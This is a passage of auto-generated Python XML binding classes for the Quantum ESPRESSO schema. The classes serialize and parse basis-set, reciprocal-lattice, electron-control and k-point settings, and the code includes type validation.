            eol_ = ''
        if self.gamma_only is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:gamma_only>%s</qes:gamma_only>%s' % (self.gds_format_boolean(self.gamma_only, input_name='gamma_only'), eol_))
        if self.ecutwfc is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ecutwfc>%s</qes:ecutwfc>%s' % (self.gds_format_double(self.ecutwfc, input_name='ecutwfc'), eol_))
        if self.ecutrho is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ecutrho>%s</qes:ecutrho>%s' % (self.gds_format_double(self.ecutrho, input_name='ecutrho'), eol_))
        if self.fft_grid is not None:
            self.fft_grid.export(outfile, level, namespaceprefix_, name_='fft_grid', pretty_print=pretty_print)
        if self.fft_smooth is not None:
            self.fft_smooth.export(outfile, level, namespaceprefix_, name_='fft_smooth', pretty_print=pretty_print)
        if self.fft_box is not None:
            self.fft_box.export(outfile, level, namespaceprefix_, name_='fft_box', pretty_print=pretty_print)
        if self.ngm is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ngm>%s</qes:ngm>%s' % (self.gds_format_integer(self.ngm, input_name='ngm'), eol_))
        if self.ngms is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ngms>%s</qes:ngms>%s' % (self.gds_format_integer(self.ngms, input_name='ngms'), eol_))
        if self.npwx is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:npwx>%s</qes:npwx>%s' % (self.gds_format_integer(self.npwx, input_name='npwx'), eol_))
        if self.reciprocal_lattice is not None:
            self.reciprocal_lattice.export(outfile, level, namespaceprefix_, name_='reciprocal_lattice', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # basis_setType declares no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of a basis_setType node and store its value."""
        if nodeName_ == 'gamma_only':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'gamma_only')
            self.gamma_only = ival_
        elif nodeName_ == 'ecutwfc' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'ecutwfc')
            self.ecutwfc = fval_
        elif nodeName_ == 'ecutrho' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'ecutrho')
            self.ecutrho = fval_
        elif nodeName_ == 'fft_grid':
            obj_ = basisSetItemType.factory()
            obj_.build(child_)
            self.fft_grid = obj_
            obj_.original_tagname_ = 'fft_grid'
        elif nodeName_ == 'fft_smooth':
            obj_ = basisSetItemType.factory()
            obj_.build(child_)
            self.fft_smooth = obj_
            obj_.original_tagname_ = 'fft_smooth'
        elif nodeName_ == 'fft_box':
            obj_ = basisSetItemType.factory()
            obj_.build(child_)
            self.fft_box = obj_
            obj_.original_tagname_ = 'fft_box'
        # ngm / ngms / npwx are xsd:positiveInteger: reject values <= 0.
        elif nodeName_ == 'ngm' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'ngm')
            self.ngm = ival_
        elif nodeName_ == 'ngms' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'ngms')
            self.ngms = ival_
        elif nodeName_ == 'npwx' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'npwx')
            self.npwx = ival_
        elif nodeName_ == 'reciprocal_lattice':
            obj_ = reciprocal_latticeType.factory()
            obj_.build(child_)
            self.reciprocal_lattice = obj_
            obj_.original_tagname_ = 'reciprocal_lattice'
# end class basis_setType
class basisSetItemType(GeneratedsSuper):
    """Generated binding for the qes `basisSetItemType` complex type.

    An FFT-grid element carrying three positive-integer attributes
    (nr1, nr2, nr3 — the grid dimensions) and optional text content
    (valueOf_).  Auto-generated by generateDS; do not edit by hand.
    """
    subclass = None
    superclass = None
    def __init__(self, nr1=None, nr2=None, nr3=None, valueOf_=None):
        self.original_tagname_ = None
        # _cast coerces the constructor arguments to int (None passes through).
        self.nr1 = _cast(int, nr1)
        self.nr2 = _cast(int, nr2)
        self.nr3 = _cast(int, nr3)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Standard generateDS factory: prefer a user-supplied subclass module,
        # then the `subclass` hook, then this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, basisSetItemType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if basisSetItemType.subclass:
            return basisSetItemType.subclass(*args_, **kwargs_)
        else:
            return basisSetItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_nr1(self): return self.nr1
    def set_nr1(self, nr1): self.nr1 = nr1
    def get_nr2(self): return self.nr2
    def set_nr2(self, nr2): self.nr2 = nr2
    def get_nr3(self): return self.nr3
    def set_nr3(self, nr3): self.nr3 = nr3
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        """Return True when the element has text content (numeric 0 counts)."""
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='basisSetItemType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element (tag + attributes + text content) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('basisSetItemType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            # Use the tag this object was parsed from, not the type name.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='basisSetItemType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='basisSetItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='basisSetItemType'):
        """Write the nr1/nr2/nr3 attributes, each at most once."""
        if self.nr1 is not None and 'nr1' not in already_processed:
            already_processed.add('nr1')
            outfile.write(' nr1="%s"' % self.gds_format_integer(self.nr1, input_name='nr1'))
        if self.nr2 is not None and 'nr2' not in already_processed:
            already_processed.add('nr2')
            outfile.write(' nr2="%s"' % self.gds_format_integer(self.nr2, input_name='nr2'))
        if self.nr3 is not None and 'nr3' not in already_processed:
            already_processed.add('nr3')
            outfile.write(' nr3="%s"' % self.gds_format_integer(self.nr3, input_name='nr3'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='basisSetItemType', fromsubclass_=False, pretty_print=True):
        # Text-only element: no child elements to export.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse the nr1/nr2/nr3 attributes (xsd:positiveInteger: must be > 0)."""
        value = find_attr_value_('nr1', node)
        if value is not None and 'nr1' not in already_processed:
            already_processed.add('nr1')
            try:
                self.nr1 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.nr1 <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('nr2', node)
        if value is not None and 'nr2' not in already_processed:
            already_processed.add('nr2')
            try:
                self.nr2 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.nr2 <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('nr3', node)
        if value is not None and 'nr3' not in already_processed:
            already_processed.add('nr3')
            try:
                self.nr3 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.nr3 <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Text-only element: no child elements to parse.
        pass
# end class basisSetItemType
class reciprocal_latticeType(GeneratedsSuper):
    """Generated binding for the qes `reciprocal_latticeType` complex type.

    Holds the three reciprocal-lattice basis vectors b1, b2, b3, each a
    d3vectorType (a whitespace-separated list of three doubles when parsed
    from XML).  Auto-generated by generateDS; validate_d3vectorType fixed
    by hand (see below).
    """
    subclass = None
    superclass = None
    def __init__(self, b1=None, b2=None, b3=None):
        self.original_tagname_ = None
        self.b1 = b1
        self.validate_d3vectorType(self.b1)
        self.b2 = b2
        self.validate_d3vectorType(self.b2)
        self.b3 = b3
        self.validate_d3vectorType(self.b3)
    def factory(*args_, **kwargs_):
        # Standard generateDS factory: prefer a user-supplied subclass module,
        # then the `subclass` hook, then this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, reciprocal_latticeType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if reciprocal_latticeType.subclass:
            return reciprocal_latticeType.subclass(*args_, **kwargs_)
        else:
            return reciprocal_latticeType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_b1(self): return self.b1
    def set_b1(self, b1): self.b1 = b1
    def get_b2(self): return self.b2
    def set_b2(self, b2): self.b2 = b2
    def get_b3(self): return self.b3
    def set_b3(self, b3): self.b3 = b3
    def validate_d3vectorType(self, value):
        # Validate type d3vectorType, a restriction on double (3 components).
        # BUG FIX: the generated code compared len(str(value)) against 3 —
        # i.e. the number of *characters* in the textual form — so any
        # well-formed vector such as "1.0 2.0 3.0" spuriously triggered the
        # warning.  Count components instead: whitespace-separated tokens for
        # strings, items for sequences.
        if value is not None and Validate_simpletypes_:
            if isinstance(value, str):
                ncomponents = len(value.split())
            else:
                try:
                    ncomponents = len(value)
                except TypeError:
                    # Scalar (e.g. a single float): a single component.
                    ncomponents = 1
            if ncomponents != 3:
                warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
    def hasContent_(self):
        """Return True when any child element is set (element is non-empty)."""
        if (
            self.b1 is not None or
            self.b2 is not None or
            self.b3 is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='reciprocal_latticeType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element (tag + attributes + children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('reciprocal_latticeType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            # Use the tag this object was parsed from, not the type name.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='reciprocal_latticeType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='reciprocal_latticeType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='reciprocal_latticeType'):
        # reciprocal_latticeType declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='reciprocal_latticeType', fromsubclass_=False, pretty_print=True):
        """Write b1, b2, b3 in schema order, skipping those set to None."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.b1 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:b1>%s</qes:b1>%s' % (self.gds_format_double_list(self.b1, input_name='b1'), eol_))
        if self.b2 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:b2>%s</qes:b2>%s' % (self.gds_format_double_list(self.b2, input_name='b2'), eol_))
        if self.b3 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:b3>%s</qes:b3>%s' % (self.gds_format_double_list(self.b3, input_name='b3'), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # reciprocal_latticeType declares no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element (b1/b2/b3) and store its validated value."""
        if nodeName_ == 'b1':
            b1_ = child_.text
            b1_ = self.gds_validate_double_list(b1_, node, 'b1')
            self.b1 = b1_
            # validate type d3vectorType
            self.validate_d3vectorType(self.b1)
        elif nodeName_ == 'b2':
            b2_ = child_.text
            b2_ = self.gds_validate_double_list(b2_, node, 'b2')
            self.b2 = b2_
            # validate type d3vectorType
            self.validate_d3vectorType(self.b2)
        elif nodeName_ == 'b3':
            b3_ = child_.text
            b3_ = self.gds_validate_double_list(b3_, node, 'b3')
            self.b3 = b3_
            # validate type d3vectorType
            self.validate_d3vectorType(self.b3)
# end class reciprocal_latticeType
class electron_controlType(GeneratedsSuper):
    """Generated binding for the qes `electron_controlType` complex type.

    SCF electron-minimization settings: diagonalization algorithm
    (diagoType: 'davidson' or 'cg'), charge-density mixing
    (mixingModeType: 'plain', 'TF', 'local-TF'; mixing_beta, mixing_ndim),
    convergence controls (conv_thr, max_nstep), real-space augmentation
    flags, and diagonalizer tuning knobs.  Auto-generated by generateDS;
    do not edit by hand.
    """
    subclass = None
    superclass = None
    def __init__(self, diagonalization=None, mixing_mode=None, mixing_beta=None, conv_thr=None, mixing_ndim=None, max_nstep=None, real_space_q=None, tq_smoothing=None, tbeta_smoothing=None, diago_thr_init=None, diago_full_acc=None, diago_cg_maxiter=None, diago_david_ndim=None):
        self.original_tagname_ = None
        self.diagonalization = diagonalization
        self.validate_diagoType(self.diagonalization)
        self.mixing_mode = mixing_mode
        self.validate_mixingModeType(self.mixing_mode)
        self.mixing_beta = mixing_beta
        self.conv_thr = conv_thr
        self.mixing_ndim = mixing_ndim
        self.max_nstep = max_nstep
        self.real_space_q = real_space_q
        self.tq_smoothing = tq_smoothing
        self.tbeta_smoothing = tbeta_smoothing
        self.diago_thr_init = diago_thr_init
        self.diago_full_acc = diago_full_acc
        self.diago_cg_maxiter = diago_cg_maxiter
        self.diago_david_ndim = diago_david_ndim
    def factory(*args_, **kwargs_):
        # Standard generateDS factory: prefer a user-supplied subclass module,
        # then the `subclass` hook, then this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, electron_controlType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if electron_controlType.subclass:
            return electron_controlType.subclass(*args_, **kwargs_)
        else:
            return electron_controlType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_diagonalization(self): return self.diagonalization
    def set_diagonalization(self, diagonalization): self.diagonalization = diagonalization
    def get_mixing_mode(self): return self.mixing_mode
    def set_mixing_mode(self, mixing_mode): self.mixing_mode = mixing_mode
    def get_mixing_beta(self): return self.mixing_beta
    def set_mixing_beta(self, mixing_beta): self.mixing_beta = mixing_beta
    def get_conv_thr(self): return self.conv_thr
    def set_conv_thr(self, conv_thr): self.conv_thr = conv_thr
    def get_mixing_ndim(self): return self.mixing_ndim
    def set_mixing_ndim(self, mixing_ndim): self.mixing_ndim = mixing_ndim
    def get_max_nstep(self): return self.max_nstep
    def set_max_nstep(self, max_nstep): self.max_nstep = max_nstep
    def get_real_space_q(self): return self.real_space_q
    def set_real_space_q(self, real_space_q): self.real_space_q = real_space_q
    def get_tq_smoothing(self): return self.tq_smoothing
    def set_tq_smoothing(self, tq_smoothing): self.tq_smoothing = tq_smoothing
    def get_tbeta_smoothing(self): return self.tbeta_smoothing
    def set_tbeta_smoothing(self, tbeta_smoothing): self.tbeta_smoothing = tbeta_smoothing
    def get_diago_thr_init(self): return self.diago_thr_init
    def set_diago_thr_init(self, diago_thr_init): self.diago_thr_init = diago_thr_init
    def get_diago_full_acc(self): return self.diago_full_acc
    def set_diago_full_acc(self, diago_full_acc): self.diago_full_acc = diago_full_acc
    def get_diago_cg_maxiter(self): return self.diago_cg_maxiter
    def set_diago_cg_maxiter(self, diago_cg_maxiter): self.diago_cg_maxiter = diago_cg_maxiter
    def get_diago_david_ndim(self): return self.diago_david_ndim
    def set_diago_david_ndim(self, diago_david_ndim): self.diago_david_ndim = diago_david_ndim
    def validate_diagoType(self, value):
        # Validate type diagoType, a restriction on string.
        # Warns (does not raise) when the value is outside the xsd enumeration.
        if value is not None and Validate_simpletypes_:
            value = str(value)
            enumerations = ['davidson', 'cg']
            enumeration_respectee = False
            for enum in enumerations:
                if value == enum:
                    enumeration_respectee = True
                    break
            if not enumeration_respectee:
                warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on diagoType' % {"value" : value.encode("utf-8")} )
    def validate_mixingModeType(self, value):
        # Validate type mixingModeType, a restriction on string.
        # Warns (does not raise) when the value is outside the xsd enumeration.
        if value is not None and Validate_simpletypes_:
            value = str(value)
            enumerations = ['plain', 'TF', 'local-TF']
            enumeration_respectee = False
            for enum in enumerations:
                if value == enum:
                    enumeration_respectee = True
                    break
            if not enumeration_respectee:
                warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on mixingModeType' % {"value" : value.encode("utf-8")} )
    def hasContent_(self):
        """Return True when any child element is set (element is non-empty)."""
        if (
            self.diagonalization is not None or
            self.mixing_mode is not None or
            self.mixing_beta is not None or
            self.conv_thr is not None or
            self.mixing_ndim is not None or
            self.max_nstep is not None or
            self.real_space_q is not None or
            self.tq_smoothing is not None or
            self.tbeta_smoothing is not None or
            self.diago_thr_init is not None or
            self.diago_full_acc is not None or
            self.diago_cg_maxiter is not None or
            self.diago_david_ndim is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='electron_controlType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element (tag + attributes + children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('electron_controlType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            # Use the tag this object was parsed from, not the type name.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='electron_controlType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='electron_controlType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='electron_controlType'):
        # electron_controlType declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='electron_controlType', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order, skipping those set to None."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.diagonalization is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:diagonalization>%s</qes:diagonalization>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.diagonalization), input_name='diagonalization')), eol_))
        if self.mixing_mode is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:mixing_mode>%s</qes:mixing_mode>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.mixing_mode), input_name='mixing_mode')), eol_))
        if self.mixing_beta is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:mixing_beta>%s</qes:mixing_beta>%s' % (self.gds_format_double(self.mixing_beta, input_name='mixing_beta'), eol_))
        if self.conv_thr is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:conv_thr>%s</qes:conv_thr>%s' % (self.gds_format_double(self.conv_thr, input_name='conv_thr'), eol_))
        if self.mixing_ndim is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:mixing_ndim>%s</qes:mixing_ndim>%s' % (self.gds_format_integer(self.mixing_ndim, input_name='mixing_ndim'), eol_))
        if self.max_nstep is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:max_nstep>%s</qes:max_nstep>%s' % (self.gds_format_integer(self.max_nstep, input_name='max_nstep'), eol_))
        if self.real_space_q is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:real_space_q>%s</qes:real_space_q>%s' % (self.gds_format_boolean(self.real_space_q, input_name='real_space_q'), eol_))
        if self.tq_smoothing is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:tq_smoothing>%s</qes:tq_smoothing>%s' % (self.gds_format_boolean(self.tq_smoothing, input_name='tq_smoothing'), eol_))
        if self.tbeta_smoothing is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:tbeta_smoothing>%s</qes:tbeta_smoothing>%s' % (self.gds_format_boolean(self.tbeta_smoothing, input_name='tbeta_smoothing'), eol_))
        if self.diago_thr_init is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:diago_thr_init>%s</qes:diago_thr_init>%s' % (self.gds_format_double(self.diago_thr_init, input_name='diago_thr_init'), eol_))
        if self.diago_full_acc is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:diago_full_acc>%s</qes:diago_full_acc>%s' % (self.gds_format_boolean(self.diago_full_acc, input_name='diago_full_acc'), eol_))
        if self.diago_cg_maxiter is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:diago_cg_maxiter>%s</qes:diago_cg_maxiter>%s' % (self.gds_format_integer(self.diago_cg_maxiter, input_name='diago_cg_maxiter'), eol_))
        if self.diago_david_ndim is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:diago_david_ndim>%s</qes:diago_david_ndim>%s' % (self.gds_format_integer(self.diago_david_ndim, input_name='diago_david_ndim'), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # electron_controlType declares no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of an electron_controlType node.

        Note: diago_cg_maxiter is nonNegativeInteger (>= 0) while the other
        integer children are positiveInteger (> 0).
        """
        if nodeName_ == 'diagonalization':
            diagonalization_ = child_.text
            diagonalization_ = self.gds_validate_string(diagonalization_, node, 'diagonalization')
            self.diagonalization = diagonalization_
            # validate type diagoType
            self.validate_diagoType(self.diagonalization)
        elif nodeName_ == 'mixing_mode':
            mixing_mode_ = child_.text
            mixing_mode_ = self.gds_validate_string(mixing_mode_, node, 'mixing_mode')
            self.mixing_mode = mixing_mode_
            # validate type mixingModeType
            self.validate_mixingModeType(self.mixing_mode)
        elif nodeName_ == 'mixing_beta' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'mixing_beta')
            self.mixing_beta = fval_
        elif nodeName_ == 'conv_thr' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'conv_thr')
            self.conv_thr = fval_
        elif nodeName_ == 'mixing_ndim' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'mixing_ndim')
            self.mixing_ndim = ival_
        elif nodeName_ == 'max_nstep' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'max_nstep')
            self.max_nstep = ival_
        elif nodeName_ == 'real_space_q':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'real_space_q')
            self.real_space_q = ival_
        elif nodeName_ == 'tq_smoothing':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'tq_smoothing')
            self.tq_smoothing = ival_
        elif nodeName_ == 'tbeta_smoothing':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'tbeta_smoothing')
            self.tbeta_smoothing = ival_
        elif nodeName_ == 'diago_thr_init' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'diago_thr_init')
            self.diago_thr_init = fval_
        elif nodeName_ == 'diago_full_acc':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'diago_full_acc')
            self.diago_full_acc = ival_
        elif nodeName_ == 'diago_cg_maxiter' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ < 0:
                raise_parse_error(child_, 'requires nonNegativeInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'diago_cg_maxiter')
            self.diago_cg_maxiter = ival_
        elif nodeName_ == 'diago_david_ndim' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'diago_david_ndim')
            self.diago_david_ndim = ival_
# end class electron_controlType
class k_points_IBZType(GeneratedsSuper):
    """Generated binding for the XSD complex type ``k_points_IBZType``.

    Describes the k-point sampling of the irreducible Brillouin zone:
    either a Monkhorst-Pack grid (``monkhorst_pack``) or an explicit list
    of ``k_point`` child elements, optionally with their count ``nk``
    (a positive integer).  Auto-generated by generateDS.py; edit with care,
    regeneration will overwrite manual changes.
    """
    subclass = None
    superclass = None
    def __init__(self, monkhorst_pack=None, nk=None, k_point=None):
        self.original_tagname_ = None
        self.monkhorst_pack = monkhorst_pack
        self.nk = nk
        # Guard against the shared-mutable-default pitfall: a fresh list is
        # created when no k_point sequence is supplied.
        if k_point is None:
            self.k_point = []
        else:
            self.k_point = k_point
    def factory(*args_, **kwargs_):
        """Instantiate this class, honoring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, k_points_IBZType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if k_points_IBZType.subclass:
            return k_points_IBZType.subclass(*args_, **kwargs_)
        else:
